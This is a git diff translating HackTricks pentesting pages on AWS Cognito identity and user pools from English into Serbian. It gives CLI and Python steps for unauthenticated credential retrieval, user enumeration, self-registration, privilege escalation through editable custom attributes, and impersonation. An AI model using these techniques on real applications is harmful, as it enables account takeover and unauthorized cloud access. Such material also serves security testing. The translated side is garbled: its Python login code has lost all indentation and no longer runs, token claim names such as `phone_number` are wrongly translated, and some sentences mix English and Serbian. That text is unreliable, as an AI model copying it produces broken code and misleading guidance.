+Međutim, postoji način da se to zaobiđe, ako je **Identitetski bazen omogućio "Osnovni (Klasični) Tok"**, korisnik će moći da dobije sesiju koristeći taj tok koji **neće imati tu restriktivnu politiku sesije**.
 ```bash
 # Get auth ID
 aws cognito-identity get-id --identity-pool-id  --no-sign
@@ -145,51 +130,46 @@ aws cognito-identity get-open-id-token --identity-id  --no-sign
 ## If you don't know the role_arn use the previous enhanced flow to get it
 aws sts assume-role-with-web-identity --role-arn "arn:aws:iam:::role/" --role-session-name sessionname --web-identity-token  --no-sign
 ```
-
 > [!WARNING]
-> If you receive this **error**, it's because the **basic flow is not enabled (default)**
+> Ako primite ovu **grešku**, to je zato što **osnovni tok nije omogućen (podrazumevano)**
 
-> `An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.`
+> `Došlo je do greške (InvalidParameterException) prilikom pozivanja operacije GetOpenIdToken: Osnovni (klasični) tok nije omogućen, molimo koristite unapređeni tok.`
 
-Having a set of IAM credentials you should check [which access you have](../../#whoami) and try to [escalate privileges](../../aws-privilege-escalation/).
+Imajući set IAM kredencijala, trebali biste proveriti [koje pristupe imate](../../#whoami) i pokušati da [povećate privilegije](../../aws-privilege-escalation/).
 
-### Authenticated
+### Autentifikovani
 
 > [!NOTE]
-> Remember that **authenticated users** will be probably granted **different permissions**, so if you can **sign up inside the app**, try doing that and get the new credentials.
+> Zapamtite da će **autentifikovani korisnici** verovatno imati **različite dozvole**, pa ako možete **da se prijavite unutar aplikacije**, pokušajte to i dobijte nove kredencijale.
 
-There could also be **roles** available for **authenticated users accessing the Identity Poo**l.
+Takođe mogu postojati **uloge** dostupne za **autentifikovane korisnike koji pristupaju Identity Pool**.
 
-For this you might need to have access to the **identity provider**. If that is a **Cognito User Pool**, maybe you can abuse the default behaviour and **create a new user yourself**.
+Za to možda ćete morati da imate pristup **provajderu identiteta**. Ako je to **Cognito User Pool**, možda možete da iskoristite podrazumevano ponašanje i **napravite novog korisnika sami**.
 
 > [!TIP]
-> The **IAM Cognito athenticated role created via is called** by default `Cognito_Auth_Role`
+> **IAM Cognito autentifikovana uloga kreirana putem** se podrazumevano naziva `Cognito_Auth_Role`
 
-Anyway, the **following example** expects that you have already logged in inside a **Cognito User Pool** used to access the Identity Pool (don't forget that other types of identity providers could also be configured).
+U svakom slučaju, **sledeći primer** očekuje da ste se već prijavili unutar **Cognito User Pool** koji se koristi za pristup Identity Pool-u (ne zaboravite da se drugi tipovi provajdera identiteta takođe mogu konfigurisati).
 
 
aws cognito-identity get-id \
-    --identity-pool-id <identity_pool_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-pool-id <identity_pool_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
-# Get the identity_id from the previous commnad response
+# Dobijte identity_id iz prethodnog odgovora komande
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
-    --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
+--identity-id <identity_id> \
+--logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 
 
-# In the IdToken you can find roles a user has access because of User Pool Groups
-# User the --custom-role-arn to get credentials to a specific role
+# U IdToken-u možete pronaći uloge kojima korisnik ima pristup zbog grupa User Pool-a
+# Koristite --custom-role-arn da dobijete kredencijale za specifičnu ulogu
 aws cognito-identity get-credentials-for-identity \
-    --identity-id <identity_id> \
+--identity-id <identity_id> \
     --custom-role-arn <role_arn> \
     --logins cognito-idp.<region>.amazonaws.com/<YOUR_USER_POOL_ID>=<ID_TOKEN>
 

 
 > [!WARNING]
-> It's possible to **configure different IAM roles depending on the identity provide**r the user is being logged in or even just depending **on the user** (using claims). Therefore, if you have access to different users through the same or different providers, if might be **worth it to login and access the IAM roles of all of them**.
+> Moguće je **konfigurisati različite IAM uloge u zavisnosti od provajdera identiteta** preko kojeg se korisnik prijavljuje ili čak samo u zavisnosti **od korisnika** (koristeći tvrdnje). Stoga, ako imate pristup različitim korisnicima putem istog ili različitih provajdera, možda bi **bilo korisno da se prijavite i pristupite IAM ulogama svih njih**.
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
index 08e06fb45..c2ad9cf59 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md
@@ -2,32 +2,31 @@
 
 {{#include ../../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
+Korisnički bazen je direktorij korisnika u Amazon Cognito. Sa korisničkim bazenom, vaši korisnici mogu **prijaviti se na vašu veb ili mobilnu aplikaciju** putem Amazon Cognito, **ili se federisati** putem **treće strane** provajdera identiteta (IdP). Bez obzira da li se vaši korisnici prijavljuju direktno ili putem treće strane, svi članovi korisničkog bazena imaju profil u direktorijumu kojem možete pristupiti putem SDK-a.
 
-User pools provide:
+Korisnički bazeni pružaju:
 
-- Sign-up and sign-in services.
-- A built-in, customizable web UI to sign in users.
-- Social sign-in with Facebook, Google, Login with Amazon, and Sign in with Apple, and through SAML and OIDC identity providers from your user pool.
-- User directory management and user profiles.
-- Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
-- Customized workflows and user migration through AWS Lambda triggers.
+- Usluge registracije i prijavljivanja.
+- Ugrađeni, prilagodljivi veb UI za prijavljivanje korisnika.
+- Društveno prijavljivanje putem Facebook-a, Google-a, Login with Amazon, i Sign in with Apple, kao i putem SAML i OIDC provajdera identiteta iz vašeg korisničkog bazena.
+- Upravljanje korisničkim direktorijumom i korisničkim profilima.
+- Bezbednosne funkcije kao što su višefaktorska autentifikacija (MFA), provere za kompromitovane akreditive, zaštita od preuzimanja naloga, i verifikacija telefona i e-pošte.
+- Prilagođeni radni tokovi i migracija korisnika putem AWS Lambda okidača.
 
-**Source code** of applications will usually also contain the **user pool ID** and the **client application ID**, (and some times the **application secret**?) which are needed for a **user to login** to a Cognito User Pool.
+**Izvorni kod** aplikacija obično takođe sadrži **ID korisničkog bazena** i **ID klijentske aplikacije**, (i ponekad **tajnu aplikacije**?) koji su potrebni za **prijavu korisnika** u Cognito korisnički bazen.
 
-### Potential attacks
+### Potencijalni napadi
 
-- **Registration**: By default a user can register himself, so he could create a user for himself.
-- **User enumeration**: The registration functionality can be used to find usernames that already exists. This information can be useful for the brute-force attack.
-- **Login brute-force**: In the [**Authentication**](cognito-user-pools.md#authentication) section you have all the **methods** that a user have to **login**, you could try to brute-force them **find valid credentials**.
+- **Registracija**: Po defaultu, korisnik se može registrovati sam, tako da može kreirati korisnika za sebe.
+- **Enumeracija korisnika**: Funkcionalnost registracije može se koristiti za pronalaženje korisničkih imena koja već postoje. Ove informacije mogu biti korisne za napad brute-force.
+- **Brute-force prijava**: U [**Autentifikaciji**](cognito-user-pools.md#authentication) imate sve **metode** koje korisnik ima za **prijavu**, mogli biste pokušati da ih brute-force-ujete **pronađete važeće akreditive**.
 
-### Tools for pentesting
-
-- [Pacu](https://github.com/RhinoSecurityLabs/pacu), now includes the `cognito__enum` and `cognito__attack` modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc.\
-  For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page.
+### Alati za pentesting
 
+- [Pacu](https://github.com/RhinoSecurityLabs/pacu), sada uključuje `cognito__enum` i `cognito__attack` module koji automatizuju enumeraciju svih Cognito resursa u nalogu i označavaju slabe konfiguracije, korisničke atribute korišćene za kontrolu pristupa, itd., i takođe automatizuju kreiranje korisnika (uključujući podršku za MFA) i eskalaciju privilegija na osnovu modifikabilnih prilagođenih atributa, upotrebljivih akreditiva identitetskog bazena, preuzimljivih uloga u id tokenima, itd.\
+Za opis funkcija modula pogledajte deo 2 [blog posta](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). Za uputstva za instalaciju pogledajte glavnu stranicu [Pacu](https://github.com/RhinoSecurityLabs/pacu).
 ```bash
 # Run cognito__enum usage to gather all user pools, user pool clients, identity pools, users, etc. visible in the current AWS account
 Pacu (new:test) > run cognito__enum
@@ -37,201 +36,169 @@ Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gma
 us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients
 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX
 ```
-
-- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including unwanted account creation and account oracle. Check [this link](https://github.com/padok-team/cognito-scanner) for more info.
-
+- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) je CLI alat u python-u koji implementira različite napade na Cognito, uključujući neželjeno kreiranje naloga i oracle naloga. Proverite [ovaj link](https://github.com/padok-team/cognito-scanner) za više informacija.
 ```bash
 # Install
 pip install cognito-scanner
 # Run
 cognito-scanner --help
 ```
-
-- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): This script allows to enumerate valid attributes for users.
-
+- [CognitoAttributeEnum](https://github.com/punishell/CognitoAttributeEnum): Ovaj skript omogućava enumeraciju validnih atributa za korisnike.
 ```bash
 python cognito-attribute-enu.py -client_id 16f1g98bfuj9i0g3f8be36kkrl
 ```
+## Registracija
 
-## Registration
-
-User Pools allows by **default** to **register new users**.
-
+User Pools omogućava **podrazumevano** da se **registruju novi korisnici**.
 ```bash
 aws cognito-idp sign-up --client-id  \
-    --username  --password  \
-    --region  --no-sign-request
+--username  --password  \
+--region  --no-sign-request
 ```
+#### Ako bilo ko može da se registruje
 
-#### If anyone can register
-
-You might find an error indicating you that you need to **provide more details** of abut the user:
-
+Možda ćete naići na grešku koja ukazuje da treba da **obezbedite više detalja** o korisniku:
 ```
 An error occurred (InvalidParameterException) when calling the SignUp operation: Attributes did not conform to the schema: address: The attribute is required
 ```
-
-You can provide the needed details with a JSON such as:
-
+Možete pružiti potrebne detalje sa JSON-om kao što je:
 ```json
 --user-attributes '[{"Name": "email", "Value": "carlospolop@gmail.com"}, {"Name":"gender", "Value": "M"}, {"Name": "address", "Value": "street"}, {"Name": "custom:custom_name", "Value":"supername&\"*$"}]'
 ```
-
-You could use this functionality also to **enumerate existing users.** This is the error message when a user already exists with that name:
-
+Možete koristiti ovu funkcionalnost takođe da **enumerišete postojeće korisnike.** Ovo je poruka o grešci kada korisnik već postoji sa tim imenom:
 ```
 An error occurred (UsernameExistsException) when calling the SignUp operation: User already exists
 ```
-
 > [!NOTE]
-> Note in the previous command how the **custom attributes start with "custom:"**.\
-> Also know that when registering you **cannot create for the user new custom attributes**. You can only give value to **default attributes** (even if they aren't required) and **custom attributes specified**.
-
-Or just to test if a client id exists. This is the error if the client-id doesn't exist:
+> Obratite pažnju na prethodnu komandu kako **prilagođene atribute počinju sa "custom:"**.\
+> Takođe, znajte da prilikom registracije **ne možete kreirati nove prilagođene atribute za korisnika**. Možete samo dodeliti vrednost **podrazumevanim atributima** (čak i ako nisu obavezni) i **prilagođenim atributima koji su navedeni**.
 
+Ili samo da testirate da li klijent ID postoji. Ovo je greška ako klijent-ID ne postoji:
 ```
 An error occurred (ResourceNotFoundException) when calling the SignUp operation: User pool client 3ig612gjm56p1ljls1prq2miut does not exist.
 ```
+#### Ako samo administrator može da registruje korisnike
 
-#### If only admin can register users
-
-You will find this error and you own't be able to register or enumerate users:
-
+Naći ćete ovu grešku i nećete moći da registrujete ili enumerišete korisnike:
 ```
 An error occurred (NotAuthorizedException) when calling the SignUp operation: SignUp is not permitted for this user pool
 ```
-
 ### Verifying Registration
 
-Cognito allows to **verify a new user by verifying his email or phone number**. Therefore, when creating a user usually you will be required at least the username and password and the **email and/or telephone number**. Just set one **you control** so you will receive the code to **verify your** newly created user **account** like this:
-
+Cognito omogućava da **verifikujete novog korisnika verifikovanjem njegovog emaila ili broja telefona**. Stoga, prilikom kreiranja korisnika obično će vam biti potrebni barem korisničko ime i lozinka, kao i **email i/ili broj telefona**. Samo postavite jedan **koji kontrolišete** kako biste primili kod za **verifikaciju vašeg** novokreiranog korisničkog **naloga** ovako:
 ```bash
 aws cognito-idp confirm-sign-up --client-id  \
-    --username aasdasd2 --confirmation-code  \
-    --no-sign-request --region us-east-1
+--username aasdasd2 --confirmation-code  \
+--no-sign-request --region us-east-1
 ```
-
 > [!WARNING]
-> Even if **looks like you can use the same email** and phone number, when you need to verify the created user Cognito will complain about using the same info and **won't let you verify the account**.
+> Čak i ako **izgleda da možete koristiti istu email** i telefonski broj, kada treba da verifikujete kreiranog korisnika, Cognito će se žaliti na korišćenje istih informacija i **neće vam dozvoliti da verifikujete nalog**.
 
-### Privilege Escalation / Updating Attributes
-
-By default a user can **modify the value of his attributes** with something like:
+### Eskalacija privilegija / Ažuriranje atributa
 
+Po defaultu, korisnik može **modifikovati vrednost svojih atributa** sa nečim poput:
 ```bash
 aws cognito-idp update-user-attributes \
-    --region us-east-1 --no-sign-request \
-    --user-attributes Name=address,Value=street \
-    --access-token 
+--region us-east-1 --no-sign-request \
+--user-attributes Name=address,Value=street \
+--access-token 
 ```
-
-#### Custom attribute privesc
+#### Privelegije prilagođenih atributa
 
 > [!CAUTION]
-> You might find **custom attributes** being used (such as `isAdmin`), as by default you can **change the values of your own attributes** you might be able to **escalate privileges** changing the value yourself!
+> Možete pronaći **prilagođene atribute** koji se koriste (kao što je `isAdmin`), jer po defaultu možete **promeniti vrednosti svojih atributa**, možda ćete moći da **escalate privilegije** menjajući vrednost sami!
 
-#### Email/username modification privesc
+#### Privelegije modifikacije emaila/korisničkog imena
 
-You can use this to **modify the email and phone number** of a user, but then, even if the account remains as verified, those attributes are **set in unverified status** (you need to verify them again).
+Možete koristiti ovo da **modifikujete email i broj telefona** korisnika, ali tada, čak i ako račun ostane kao verifikovan, ti atributi su **postavljeni u status neproveren** (morate ih ponovo verifikovati).
 
 > [!WARNING]
-> You **won't be able to login with email or phone number** until you verify them, but you will be **able to login with the username**.\
-> Note that even if the email was modified and not verified it will appear in the ID Token inside the **`email`** **field** and the filed **`email_verified`** will be **false**, but if the app **isn't checking that you might impersonate other users**.
+> Nećete moći da se prijavite sa emailom ili brojem telefona dok ih ne verifikujete, ali ćete moći da se **prijavite sa korisničkim imenom**.\
+> Imajte na umu da čak i ako je email modifikovan i nije verifikovan, pojaviće se u ID Token-u unutar **`email`** **polja** i polje **`email_verified`** će biti **false**, ali ako aplikacija **ne proverava to, možda ćete moći da se pretvarate da ste drugi korisnici**.
 
-> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**.
-
-Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**:
+> Pored toga, imajte na umu da možete staviti bilo šta unutar **`name`** polja jednostavno modifikujući **atribut imena**. Ako aplikacija **proverava** to polje iz nekog razloga **umesto `email`** (ili bilo kog drugog atributa), možda ćete moći da **se pretvarate da ste drugi korisnici**.
 
+U svakom slučaju, ako ste iz nekog razloga promenili svoj email, na primer, na novi na koji možete pristupiti, možete **potvrditi email sa kodom koji ste primili na tu email adresu**:
 ```bash
 aws cognito-idp verify-user-attribute \
-    --access-token  \
-    --attribute-name email --code  \
-    --region  --no-sign-request
+--access-token  \
+--attribute-name email --code  \
+--region  --no-sign-request
 ```
-
-Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**.
+Koristite **`phone_number`** umesto **`email`** za promenu/verifikaciju **novog broja telefona**.
 
 > [!NOTE]
-> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user.
+> Administrator takođe može omogućiti opciju da se **prijavi sa korisničkim imenom po izboru korisnika**. Imajte na umu da nećete moći da promenite ovu vrednost na **bilo koje korisničko ime ili preferred_username koje se već koristi** za impersonaciju drugog korisnika.
 
-### Recover/Change Password
-
-It's possible to recover a password just **knowing the username** (or email or phone is accepted) and having access to it as a code will be sent there:
+### Oporavak/Promena lozinke
 
+Moguće je oporaviti lozinku samo **znajući korisničko ime** (ili email ili telefon se prihvata) i imati pristup jer će kod biti poslat tamo:
 ```bash
 aws cognito-idp forgot-password \
-    --client-id  \
-    --username  --region 
+--client-id  \
+--username  --region 
 ```
-
 > [!NOTE]
-> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users
-
-With the code you can change the password with:
+> Odgovor servera će uvek biti pozitivan, kao da korisničko ime postoji. Ne možete koristiti ovu metodu za enumeraciju korisnika
 
+Sa kodom možete promeniti lozinku sa:
 ```bash
 aws cognito-idp confirm-forgot-password \
-    --client-id  \
-    --username  \
-    --confirmation-code  \
-    --password  --region 
+--client-id  \
+--username  \
+--confirmation-code  \
+--password  --region 
 ```
-
-To change the password you need to **know the previous password**:
-
+Da biste promenili lozinku, potrebno je da **znate prethodnu lozinku**:
 ```bash
 aws cognito-idp change-password \
-    --previous-password  \
-    --proposed-password  \
-    --access-token 
+--previous-password  \
+--proposed-password  \
+--access-token 
 ```
+## Autentifikacija
 
-## Authentication
+Grupa korisnika podržava **različite načine autentifikacije**. Ako imate **korisničko ime i lozinku**, postoje i **različite metode** za prijavu.\
+Pored toga, kada je korisnik autentifikovan u grupi, **dodeljuju se 3 vrste tokena**: **ID token**, **Access token** i **Refresh token**.
 
-A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\
-Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**.
-
-- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications.
-  - The ID Token is the token that **contains the attributes values of the user**, even the custom ones.
-- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes.
-- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**.
+- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): Sadrži tvrdnje o **identitetu autentifikovanog korisnika**, kao što su `ime`, `email` i `broj_telefona`. ID token se takođe može koristiti za **autentifikaciju korisnika na vašim serverskim resursima ili aplikacijama**. Morate **verifikovati** **potpis** ID tokena pre nego što možete verovati bilo kojim tvrdnjama unutar ID tokena ako ga koristite u spoljnim aplikacijama.
+- ID Token je token koji **sadrži vrednosti atributa korisnika**, čak i prilagođenih.
+- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): Sadrži tvrdnje o autentifikovanom korisniku, listu **grupa korisnika i listu opsega**. Svrha access tokena je da **ovlasti API operacije** u kontekstu korisnika u grupi korisnika. Na primer, možete koristiti access token da **dodelite svom korisniku pristup** za dodavanje, promenu ili brisanje atributa korisnika.
+- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): Sa refresh tokenima možete **dobiti nove ID tokene i Access tokene** za korisnika dok **refresh token nije nevažeći**. Po **defaultu**, refresh token **isteče 30 dana nakon** što se korisnik vaše aplikacije prijavi u vašu grupu korisnika. Kada kreirate aplikaciju za vašu grupu korisnika, možete postaviti isteknuće refresh tokena aplikacije na **bilo koju vrednost između 60 minuta i 10 godina**.
 
 ### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH
 
-This is the server side authentication flow:
+Ovo je tok autentifikacije sa servera:
 
-- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters.
-- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials.
+- Aplikacija na serveru poziva **`AdminInitiateAuth` API operaciju** (umesto `InitiateAuth`). Ova operacija zahteva AWS kredencijale sa dozvolama koje uključuju **`cognito-idp:AdminInitiateAuth`** i **`cognito-idp:AdminRespondToAuthChallenge`**. Operacija vraća potrebne parametre za autentifikaciju.
+- Nakon što aplikacija na serveru ima **parametre za autentifikaciju**, poziva **`AdminRespondToAuthChallenge` API operaciju**. `AdminRespondToAuthChallenge` API operacija uspeva samo kada obezbedite AWS kredencijale.
 
-This **method is NOT enabled** by default.
+Ova **metoda NIJE omogućena** po defaultu.
 
-To **login** you **need** to know:
+Da biste **prijavili** se, **morate** znati:
 
-- user pool id
-- client id
-- username
-- password
-- client secret (only if the app is configured to use a secret)
+- id grupe korisnika
+- id klijenta
+- korisničko ime
+- lozinku
+- tajnu klijenta (samo ako je aplikacija konfigurisana da koristi tajnu)
 
 > [!NOTE]
-> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\
-> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**
-
+> Da biste mogli da se **prijavite ovom metodom**, ta aplikacija mora dozvoliti prijavu sa `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\
+> Pored toga, da biste izvršili ovu akciju, potrebni su vam kredencijali sa dozvolama **`cognito-idp:AdminInitiateAuth`** i **`cognito-idp:AdminRespondToAuthChallenge`**.
 ```python
 aws cognito-idp admin-initiate-auth \
-    --client-id  \
-    --auth-flow ADMIN_USER_PASSWORD_AUTH \
-    --region  \
-    --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH='
-    --user-pool-id ""
+--client-id  \
+--auth-flow ADMIN_USER_PASSWORD_AUTH \
+--region  \
+--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH='
+--user-pool-id ""
 
 # Check the python code to learn how to generate the hsecret_hash
 ```
-
 

 
-Code to Login
-
+Kod za prijavu
 ```python
 import boto3
 import botocore
@@ -249,61 +216,57 @@ password = ""
 boto_client = boto3.client('cognito-idp', region_name='us-east-1')
 
 def get_secret_hash(username, client_id, client_secret):
-    key = bytes(client_secret, 'utf-8')
-    message = bytes(f'{username}{client_id}', 'utf-8')
-    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+key = bytes(client_secret, 'utf-8')
+message = bytes(f'{username}{client_id}', 'utf-8')
+return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
 
 # If the Client App isn't configured to use a secret
 ## just delete the line setting the SECRET_HASH
 def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
-    try:
-        return boto_client.admin_initiate_auth(
-            UserPoolId=user_pool_id,
-            ClientId=client_id,
-            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
-            AuthParameters={
-                'USERNAME': username_or_alias,
-                'PASSWORD': password,
-                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
-            }
-        )
-    except botocore.exceptions.ClientError as e:
-        return e.response
+try:
+return boto_client.admin_initiate_auth(
+UserPoolId=user_pool_id,
+ClientId=client_id,
+AuthFlow='ADMIN_USER_PASSWORD_AUTH',
+AuthParameters={
+'USERNAME': username_or_alias,
+'PASSWORD': password,
+'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
+}
+)
+except botocore.exceptions.ClientError as e:
+return e.response
 
 print(login_user(username, password, client_id, client_secret, user_pool_id))
 ```
-
 

 
 ### USER_PASSWORD_AUTH
 
-This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\
-This **method is NOT enabled** by default.
+Ova metoda je još jedan jednostavan i **tradicionalni korisnički i lozinka autentifikacioni** tok. Preporučuje se da se **migrira tradicionalna** autentifikacija **na Cognito** i **preporučuje** se zatim da se **onemogući** i **koristi** metoda **ALLOW_USER_SRP_AUTH** umesto (jer ta nikada ne šalje lozinku preko mreže).\
+Ova **metoda NIJE omogućena** po defaultu.
 
-The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool.
+Glavna **razlika** sa **prethodnom autentifikacionom metodom** unutar koda je da **ne morate znati ID korisničkog bazena** i da **ne trebate dodatne dozvole** u Cognito korisničkom bazenu.
 
-To **login** you **need** to know:
+Da biste **se prijavili**, potrebno je da znate:
 
 - client id
-- username
-- password
-- client secret (only if the app is configured to use a secret)
+- korisničko ime
+- lozinku
+- client secret (samo ako je aplikacija konfigurisana da koristi tajnu)
 
 > [!NOTE]
-> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH.
-
+> Da biste **mogli da se prijavite ovom metodom**, ta aplikacija mora dozvoliti prijavu sa ALLOW_USER_PASSWORD_AUTH.
 ```python
 aws cognito-idp initiate-auth  --client-id  \
-    --auth-flow USER_PASSWORD_AUTH --region  \
-    --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH='
+--auth-flow USER_PASSWORD_AUTH --region  \
+--auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH='
 
 # Check the python code to learn how to generate the secret_hash
 ```
-
 

 
-Python code to Login
-
+Python kod za prijavu
 ```python
 import boto3
 import botocore
@@ -321,48 +284,46 @@ password = ""
 boto_client = boto3.client('cognito-idp', region_name='us-east-1')
 
 def get_secret_hash(username, client_id, client_secret):
-    key = bytes(client_secret, 'utf-8')
-    message = bytes(f'{username}{client_id}', 'utf-8')
-    return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
+key = bytes(client_secret, 'utf-8')
+message = bytes(f'{username}{client_id}', 'utf-8')
+return base64.b64encode(hmac.new(key, message, digestmod=hashlib.sha256).digest()).decode()
 
 # If the Client App isn't configured to use a secret
 ## just delete the line setting the SECRET_HASH
 def login_user(username_or_alias, password, client_id, client_secret, user_pool_id):
-    try:
-        return boto_client.initiate_auth(
-            ClientId=client_id,
-            AuthFlow='ADMIN_USER_PASSWORD_AUTH',
-            AuthParameters={
-                'USERNAME': username_or_alias,
-                'PASSWORD': password,
-                'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
-            }
-        )
-    except botocore.exceptions.ClientError as e:
-        return e.response
+try:
+return boto_client.initiate_auth(
+ClientId=client_id,
+AuthFlow='ADMIN_USER_PASSWORD_AUTH',
+AuthParameters={
+'USERNAME': username_or_alias,
+'PASSWORD': password,
+'SECRET_HASH': get_secret_hash(username_or_alias, client_id, client_secret)
+}
+)
+except botocore.exceptions.ClientError as e:
+return e.response
 
 print(login_user(username, password, client_id, client_secret, user_pool_id))
 ```
-
 

 
 ### USER_SRP_AUTH
 
-This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\
-This **method is enabled** by default.
+Ova situacija je slična prethodnoj, ali **umesto slanja lozinke** kroz mrežu za prijavu, **izvodi se autentifikacija izazovom** (tako da lozinka ne prolazi čak ni enkriptovana kroz mrežu).\
+Ova **metoda je omogućena** po defaultu.
 
-To **login** you **need** to know:
+Da biste **prijavili** potrebno je da znate:
 
-- user pool id
-- client id
-- username
-- password
-- client secret (only if the app is configured to use a secret)
+- id korisničkog bazena
+- id klijenta
+- korisničko ime
+- lozinku
+- klijentsku tajnu (samo ako je aplikacija konfigurisana da koristi tajnu)
 
 

 
 Code to login
-
 ```python
 from warrant.aws_srp import AWSSRP
 import os
@@ -375,32 +336,28 @@ CLIENT_SECRET = 'secreeeeet'
 os.environ["AWS_DEFAULT_REGION"] = ""
 
 aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID,
-    client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
+client_id=CLIENT_ID, client_secret=CLIENT_SECRET)
 tokens = aws.authenticate_user()
 id_token = tokens['AuthenticationResult']['IdToken']
 refresh_token = tokens['AuthenticationResult']['RefreshToken']
 access_token = tokens['AuthenticationResult']['AccessToken']
 token_type = tokens['AuthenticationResult']['TokenType']
 ```
-
 

 
 ### REFRESH_TOKEN_AUTH & REFRESH_TOKEN
 
-This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token.
-
